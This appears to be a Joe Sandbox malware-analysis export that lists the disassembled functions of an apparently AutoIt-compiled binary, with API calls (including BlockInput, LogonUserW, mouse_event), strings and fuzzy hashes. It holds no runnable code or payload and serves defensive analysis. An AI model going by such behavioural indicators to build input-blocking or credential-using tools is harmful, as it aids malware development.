Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 594fa7a4405a1435e6329aeffb9106a774a20c23f327e2e9cd8fb2da7417e05a
Instruction ID: 9dd375e8bca84fce85a8aced6db24960431fa669ba11a3608e20eaf8665123cc
Opcode Fuzzy Hash: 594fa7a4405a1435e6329aeffb9106a774a20c23f327e2e9cd8fb2da7417e05a
Instruction Fuzzy Hash: B3E0B676024615FFE7262B60FC49E777BADEB04311B14892AF89A80470DB62ACB0DB50

Function 0022A385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00228F87,?,?,?,00000001), ref: 0022A38A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0022A393

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 580a1507b3dbf4790725f26949e4c76fa18e44f8536ce6bb950ef12d6612df70
Instruction ID: 3b8877029c5a6891b7689d91899e9bdbaa2bde33c116b3f9f355c262e04e1da2
Opcode Fuzzy Hash: 580a1507b3dbf4790725f26949e4c76fa18e44f8536ce6bb950ef12d6612df70
Instruction Fuzzy Hash: C9B0923246420CEFCA402BA1FC4DB883F68EB44B62F004092FA1D44060CB6254508A99

Function 002745D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 002745F0

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: d6aba007cfaf68c1643f4d47e357aed351972bd481aa10ccab7e6441404b8a2f
Instruction ID: a9891fea3d2c07f0dfb366f900f3940e2df54ccd482865cc5d09905d1b3ed829
Opcode Fuzzy Hash: d6aba007cfaf68c1643f4d47e357aed351972bd481aa10ccab7e6441404b8a2f
Instruction Fuzzy Hash: BAE09A3122021A9FC300BF5AE844A9AB7E8AFA8760F00C016F809CB351DBB0A9108B90

Function 002651E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00265205

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: c60f797634b75d2bb7c2208fcbff8dbf37a8e5bb9e3f4e931bff782644bba8db
Instruction ID: b165286f06210c80d19fbb7980c5e5f8c58b951d7416cf9eaf4243fb07deece6
Opcode Fuzzy Hash: c60f797634b75d2bb7c2208fcbff8dbf37a8e5bb9e3f4e931bff782644bba8db
Instruction Fuzzy Hash: A9D092A5170E2A79EE580B24DE1FF761688F3037C1FD446CA714A890C2ECD468E6A832

Function 00259369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00258FA7), ref: 00259389

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 6d2496df8b69a3377ded82415ffe6b217d5f64fcf0a3740c64e9eb6087f1281a
Instruction ID: e9edebc1372f9db9453c5936354ec897d2683a66df5757dee6e66e7010b20d1d
Opcode Fuzzy Hash: 6d2496df8b69a3377ded82415ffe6b217d5f64fcf0a3740c64e9eb6087f1281a
Instruction Fuzzy Hash: C2D05E3226450EAFEF018EA4EC05EAE3B69EB04B01F408111FE15C50A0C775D835AB60

Function 00240722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00240734

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 66e064c835aa80f7da4906d8ace3a95b2717bb7c4adeeba1a2bae6bceb0cec55
Instruction ID: c5684b61b90792bf4a3ec2ce383396c4a024e473cfc44229148007e7c5f59cb4
Opcode Fuzzy Hash: 66e064c835aa80f7da4906d8ace3a95b2717bb7c4adeeba1a2bae6bceb0cec55
Instruction Fuzzy Hash: 5AC04CF181010DDBCB05DBA0D9C8EEE77BCAB04304F100056A105B2100D7749B448A71

Function 0022A354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0022A35A

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6b67d9a11bca5d35545ba20ea94faf4c2c83ab9fbea5bc380f405ec77c0bfa87
Instruction ID: 4c9cecc305941150cfbcdc302f4d765e1d6670d5588660adf78bcc72c90d2288
Opcode Fuzzy Hash: 6b67d9a11bca5d35545ba20ea94faf4c2c83ab9fbea5bc380f405ec77c0bfa87
Instruction Fuzzy Hash: E3A0223002020CFFCF002FA2FC0C888BFACEB002A0B0080A2FC0C00032CB33A8208AC8

Function 00277EF0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00277F45
DeleteObject.GDI32(00000000), ref: 00277F57
DestroyWindow.USER32 ref: 00277F65
GetDesktopWindow.USER32 ref: 00277F7F
GetWindowRect.USER32(00000000), ref: 00277F86
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 002780C7
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 002780D7
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0027811F
GetClientRect.USER32(00000000,?), ref: 0027812B
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00278165
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00278187
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0027819A
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002781A5
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002781AE
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002781BD
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002781C6
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002781CD
GlobalFree.KERNEL32(00000000), ref: 002781D8
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002781EA
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00293C7C,00000000), ref: 00278200
GlobalFree.KERNEL32(00000000), ref: 00278210
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00278236
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00278255
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00278277
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00278464

Strings

, xrefs: 002783EA
static, xrefs: 0027815F, 002782B6
AutoIt v3, xrefs: 00278117
DISPLAY, xrefs: 002782C7

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 156d4dd27613c4d356ad17c09500b3e57a294e2eb7764b7236edfd9e0ebbac27
Instruction ID: f7bc07cba19196ea1abf32509f54d68af38bcf8b19ba67944cd92f1284fc5679
Opcode Fuzzy Hash: 156d4dd27613c4d356ad17c09500b3e57a294e2eb7764b7236edfd9e0ebbac27
Instruction Fuzzy Hash: 36025C71910219AFDB14DF68DD8DEAE7BB9EF48310F048159F919AB2A1CB70AD11CF60

Function 00283BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00290980), ref: 00283C65
IsWindowVisible.USER32(?), ref: 00283C89

Strings

ISENABLED, xrefs: 00283CA9
TABRIGHT, xrefs: 00283CDB
FINDSTRING, xrefs: 00283DB4
UNCHECK, xrefs: 00283EC1
HIDEDROPDOWN, xrefs: 00283D3E
TABLEFT, xrefs: 00283CC5
GETCURRENTSELECTION, xrefs: 00283E21
GETLINECOUNT, xrefs: 00283F04
ISCHECKED, xrefs: 00283E77
CURRENTTAB, xrefs: 00283CFB
GETCURRENTCOL, xrefs: 00283F66
GETSELECTED, xrefs: 00283EE1
SENDCOMMANDID, xrefs: 00284018
DELSTRING, xrefs: 00283D87
EDITPASTE, xrefs: 00283F9D
CHECK, xrefs: 00283EAB
SETCURRENTSELECTION, xrefs: 00283DF4
SELECTSTRING, xrefs: 00283E44
ISVISIBLE, xrefs: 00283C75
SHOWDROPDOWN, xrefs: 00283D1E
ADDSTRING, xrefs: 00283D54
GETCURRENTLINE, xrefs: 00283F2B
GETLINE, xrefs: 00283FD9

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 8c757ceca3b659912d375736970d0f667c1b8a1d50ed9d4178c92a24d0aa1b68
Instruction ID: 034b38edd4726384628c804145079a2bd6b5e79aeb2d753b78501a2367be3236
Opcode Fuzzy Hash: 8c757ceca3b659912d375736970d0f667c1b8a1d50ed9d4178c92a24d0aa1b68
Instruction Fuzzy Hash: 96D18034235216DBCB04FF50C491AAAB7A5EF94744F208458F9465B2E3CB31EE6ACF81

Function 0028ABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0028AC55
GetSysColorBrush.USER32(0000000F), ref: 0028AC86
GetSysColor.USER32(0000000F), ref: 0028AC92
SetBkColor.GDI32(?,000000FF), ref: 0028ACAC
SelectObject.GDI32(?,?), ref: 0028ACBB
InflateRect.USER32(?,000000FF,000000FF), ref: 0028ACE6
GetSysColor.USER32(00000010), ref: 0028ACEE
CreateSolidBrush.GDI32(00000000), ref: 0028ACF5
FrameRect.USER32(?,?,00000000), ref: 0028AD04
DeleteObject.GDI32(00000000), ref: 0028AD0B
InflateRect.USER32(?,000000FE,000000FE), ref: 0028AD56
FillRect.USER32(?,?,?), ref: 0028AD88
GetWindowLongW.USER32(?,000000F0), ref: 0028ADB3

Part of subcall function 0028AF18: GetSysColor.USER32(00000012), ref: 0028AF51
Part of subcall function 0028AF18: SetTextColor.GDI32(?,?), ref: 0028AF55
Part of subcall function 0028AF18: GetSysColorBrush.USER32(0000000F), ref: 0028AF6B
Part of subcall function 0028AF18: GetSysColor.USER32(0000000F), ref: 0028AF76
Part of subcall function 0028AF18: GetSysColor.USER32(00000011), ref: 0028AF93
Part of subcall function 0028AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0028AFA1
Part of subcall function 0028AF18: SelectObject.GDI32(?,00000000), ref: 0028AFB2
Part of subcall function 0028AF18: SetBkColor.GDI32(?,00000000), ref: 0028AFBB
Part of subcall function 0028AF18: SelectObject.GDI32(?,?), ref: 0028AFC8
Part of subcall function 0028AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 0028AFE7
Part of subcall function 0028AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0028AFFE
Part of subcall function 0028AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 0028B013

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: dbec9999550d8c75a7a882aba73f59d755102d4e9dbc67186ad410f2e587ff46
Instruction ID: 33f99efbfb860eb8c6f605b7653d2decfd088024f1122a6661028cdb669c8ba7
Opcode Fuzzy Hash: dbec9999550d8c75a7a882aba73f59d755102d4e9dbc67186ad410f2e587ff46
Instruction Fuzzy Hash: 4FA1AF72019305AFD711AF64EC4CE6BBBA9FF88321F100A1AF966961E0DB71D854CF52

Function 00202FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00203072
DeleteObject.GDI32(00000000), ref: 002030B8
DeleteObject.GDI32(00000000), ref: 002030C3
DestroyIcon.USER32(00000000,?,?,?), ref: 002030CE
DestroyWindow.USER32(00000000,?,?,?), ref: 002030D9
SendMessageW.USER32(?,00001308,?,00000000), ref: 0023C77C
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0023C7B5
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0023CBDE

Part of subcall function 00201F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00202412,?,00000000,?,?,?,?,00201AA7,00000000,?), ref: 00201F76

SendMessageW.USER32(?,00001053), ref: 0023CC1B
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0023CC32
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0023CC48
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0023CC53

Strings

0, xrefs: 0023CA72

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 7a94cb9df94404a97776c77502e8f0a57230aceb901024e3b2158132ba19ecd5
Instruction ID: f156c8c1910439d9c0b33641dd6beb66c2ea8cc159e4e9cc65bbd92b4bfbdbc4
Opcode Fuzzy Hash: 7a94cb9df94404a97776c77502e8f0a57230aceb901024e3b2158132ba19ecd5
Instruction Fuzzy Hash: 3A129F70625202EFDB25DF24C888BA5B7A5BF04310F24456AF895DB2A2C731ED66CF91

Function 002127FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 00220FE6: std::exception::exception.LIBCMT ref: 0022101C
Part of subcall function 00220FE6: __CxxThrowException@8.LIBCMT ref: 00221031

__wcsnicmp.LIBCMT ref: 0021286A
__wcsnicmp.LIBCMT ref: 0021287E
__wcsnicmp.LIBCMT ref: 00212896
__wcsnicmp.LIBCMT ref: 002128AE
__wcsnicmp.LIBCMT ref: 002128C6
__wcsnicmp.LIBCMT ref: 002128DE
__wcsnicmp.LIBCMT ref: 002128F6
__wcsnicmp.LIBCMT ref: 0021290A
__wcsnicmp.LIBCMT ref: 00212948
__wcsnicmp.LIBCMT ref: 0021295C
__wcsnicmp.LIBCMT ref: 00212970
__wcsnicmp.LIBCMT ref: 00212984

Strings

', xrefs: 0024FB9F
#OnAutoItStartRegister, xrefs: 002128A8
#comments-start, xrefs: 002128F0, 00212942
#comments-end, xrefs: 0021296A
#notrayicon, xrefs: 00212878
Bad directive syntax error, xrefs: 0024FBD3, 0024FBF0
Unterminated group of comments, xrefs: 0024FCFA
#include-once, xrefs: 002128C0
", xrefs: 0024FB89
#pragma compile, xrefs: 00212864
#ce, xrefs: 0021297E
Cannot parse #include, xrefs: 0024FCE5
#cs, xrefs: 00212904, 00212956
#requireadmin, xrefs: 00212890
#include, xrefs: 002128D8

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 2660009612-1645009161
Opcode ID: 7e9957034441e6d05f4dbf86cc2f82c9588c8b740c9ca5ea5a879b3daf367dc8
Instruction ID: 510ccf2f4917095c7c525ffe7fa2992a7c80cdc0f4d6394e7fd8516c0b461179
Opcode Fuzzy Hash: 7e9957034441e6d05f4dbf86cc2f82c9588c8b740c9ca5ea5a879b3daf367dc8
Instruction Fuzzy Hash: 15A18431A2021AFBCB14EF61DD42EAF37B4AF55740F100029F805A6292DBB19EB5DB60

Function 00277B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00277BC8
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00277C87
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00277CC5
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00277CD7
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00277D1D
GetClientRect.USER32(00000000,?), ref: 00277D29
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00277D6D
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00277D7C
GetStockObject.GDI32(00000011), ref: 00277D8C
SelectObject.GDI32(00000000,00000000), ref: 00277D90
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00277DA0
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00277DA9
DeleteDC.GDI32(00000000), ref: 00277DB2
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00277DDE
SendMessageW.USER32(00000030,00000000,00000001), ref: 00277DF5
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00277E30
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00277E44
SendMessageW.USER32(00000404,00000001,00000000), ref: 00277E55
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00277E85
GetStockObject.GDI32(00000011), ref: 00277E90
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00277E9B
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00277EA5

Strings

static, xrefs: 00277D67, 00277E7F
AutoIt v3, xrefs: 00277D15
DISPLAY, xrefs: 00277D72
msctls_progress32, xrefs: 00277E26

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: de9b5bf6c405ab74f208801ad50190526c21cd8204ec40dda9917c691d6e673b
Instruction ID: ee530c053b5cb8f8a6d75d7472a5dcbf7b0ee3eb770eead2c38497cd90d96d2e
Opcode Fuzzy Hash: de9b5bf6c405ab74f208801ad50190526c21cd8204ec40dda9917c691d6e673b
Instruction Fuzzy Hash: DAA141B1A50619BFEB14DBA4DC8AFAE7B69EF08710F048115FA15A72E1C770AD10CF64

Function 0026B353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0026B361
GetDriveTypeW.KERNEL32(?,00292C4C,?,\\.\,00290980), ref: 0026B43E
SetErrorMode.KERNEL32(00000000,00292C4C,?,\\.\,00290980), ref: 0026B59C

Strings

Unknown, xrefs: 0026B45E, 0026B502
RAMDisk, xrefs: 0026B468
Removable, xrefs: 0026B490
RAID, xrefs: 0026B53A
iSCSI, xrefs: 0026B541
\\.\, xrefs: 0026B3B3
Fibre, xrefs: 0026B52C
1394, xrefs: 0026B51E
ATAPI, xrefs: 0026B510
CDROM, xrefs: 0026B472
Virtual, xrefs: 0026B564
SATA, xrefs: 0026B54F
SAS, xrefs: 0026B548
PhysicalDrive, xrefs: 0026B3EA
SSD, xrefs: 0026B4C9
Network, xrefs: 0026B47C
ATA, xrefs: 0026B517
SSA, xrefs: 0026B525
FileBackedVirtual, xrefs: 0026B56B
MMC, xrefs: 0026B55D
Fixed, xrefs: 0026B486
